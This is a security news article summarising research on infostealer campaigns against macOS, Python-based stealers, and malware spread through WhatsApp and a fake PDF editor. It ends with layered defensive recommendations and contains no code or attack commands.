In the ever-shifting landscape of cyber threats, one class of malware continues to grow in sophistication and reach: infostealers — malicious programs designed to harvest credentials, secrets, and other sensitive data from compromised systems. Historically focused on Windows machines, these threats have expanded dramatically, increasingly targeting macOS systems, written in flexible scripting languages like Python, and even abusing trusted applications and services as stealthy delivery channels.
Security researchers from Microsoft Defender Experts have been tracking this evolution throughout late 2025 and into 2026, revealing a multifaceted threat ecosystem where attackers are combining social engineering, cross-platform code, and deceptive distribution to exfiltrate valuable information at scale.
1. macOS No Longer Immune: Fake Apps and ClickFix Tricks
Despite popular belief that macOS is less prone to malware than Windows, attackers are now heavily targeting Apple systems through deceptive fronts. One common vector involves convincing users to download malicious software from untrusted sites or to execute commands pasted directly into the Terminal — often under the guise of “fixing” a browser problem or installing a helpful utility.
These so-called “ClickFix-style” scams leverage social engineering to get users to bypass built-in protections and execute code that installs infostealers. Researchers have identified at least three major macOS stealer families:
- DigitStealer — often bundled with fake “DynamicLake” installers.
- MacSync — pushed through copied Terminal commands.
- Atomic macOS Stealer (AMOS) — distributed via bogus AI tool installers.
Once deployed, these threats harvest browser passwords, saved keys, cryptocurrency wallet data, cloud credentials, and even development secrets — sending everything back to an attacker-controlled server, then erasing themselves to reduce the chance of detection.
The impact is broad: compromised credentials can lead to account takeover (including banking and corporate cloud systems), stolen wallets can mean immediate financial loss, and exposed developer secrets can open doors to source code, infrastructure, and customer data.
2. Python Stealers: Rapid, Adaptable, Cross-Platform Threats
Another worrying trend is the rise of Python-based infostealers. Unlike traditional compiled malware, Python stealers are lightweight, easily modified, and can run on multiple operating systems — making them attractive to novice and experienced threat actors alike.
Microsoft’s telemetry shows several campaigns delivering Python stealers via phishing emails, often mimicking legitimate organizational communication to trick recipients into opening attachments or links. Once executed, these stealers collect:
- Login credentials and session cookies
- Authentication tokens
- Credit card and financial info
- Cryptocurrency wallet details
One prominent example is PXA Stealer, linked to Vietnamese-language actors targeting government and educational targets in 2025. These campaigns used phishing to gain a foothold, established persistence through registry run keys or scheduled tasks, downloaded additional payloads, and exfiltrated data using legitimate services like Telegram to avoid detection.
The use of Python makes these threats harder to detect with traditional antivirus alone and emphasizes why organizations must combine phishing defenses, endpoint monitoring, and strict execution controls.
3. Abusing Trusted Platforms: WhatsApp and PDF Tools as Malware Carriers
A particularly insidious shift in attacker tactics involves leveraging widely-used applications as malware distribution platforms. Instead of setting up malicious infrastructure that might be blocked or flagged, adversaries now piggyback on platforms users trust.
For example, researchers saw a campaign that abused WhatsApp to spread malware. This multi-stage attack began with an obfuscated Visual Basic script that launches PowerShell to fetch additional payloads. One of those payloads used an automation tool (WPPConnect) to hijack WhatsApp accounts and send malicious attachments to the victim’s contacts — rapidly propagating itself almost like a worm.
Another tactic involved a malicious PDF editor installer (“Crystal PDF”) advertised through search engine ads. Once installed, it persisted via scheduled tasks and covertly harvested browser data — including cookies, session information, and credentials — and exfiltrated this data back to attackers.
These tactics illustrate a disturbing trend: threats are no longer confined to obscure attachments or suspicious executables — instead they hide within tools and channels people use every day.
4. What Organizations Can Do: Mitigation and Detection
So, how should defenders respond? Microsoft’s research underscores a layered approach built around awareness, monitoring, and hardened defenses:
- Educate users about social engineering, especially scams that ask them to install software or paste commands into consoles.
- Restrict installation of unverified macOS binaries and scripts.
- Monitor for suspicious processes — especially unusual Terminal activity or Python interpreters masquerading under trusted names.
- Inspect outbound traffic for signs of data exfiltration, such as POST requests to unknown domains.
- Harden endpoint defenses by enabling cloud-based protections, running Endpoint Detection and Response (EDR) in block mode, and preventing unauthorized script execution.
In environments that support it, advanced tools like Microsoft Defender XDR can correlate endpoint, identity, and network events — making it easier to spot subtle attacker behavior such as living-off-the-land abuse, lateral movement, or Python-driven exfiltration.
Closing Thoughts
Infostealers have moved beyond Windows executables and now span platforms, languages, and even everyday applications. By blending into legitimate ecosystems and taking advantage of user trust, these threats pose significant risks to individuals and organizations alike.
The key takeaway: Assume attackers will target every platform and avenue available — from macOS systems to Python scripts and trusted communication tools. Equally, defenders must deploy defenses that are as dynamic and adaptive as the threats themselves.
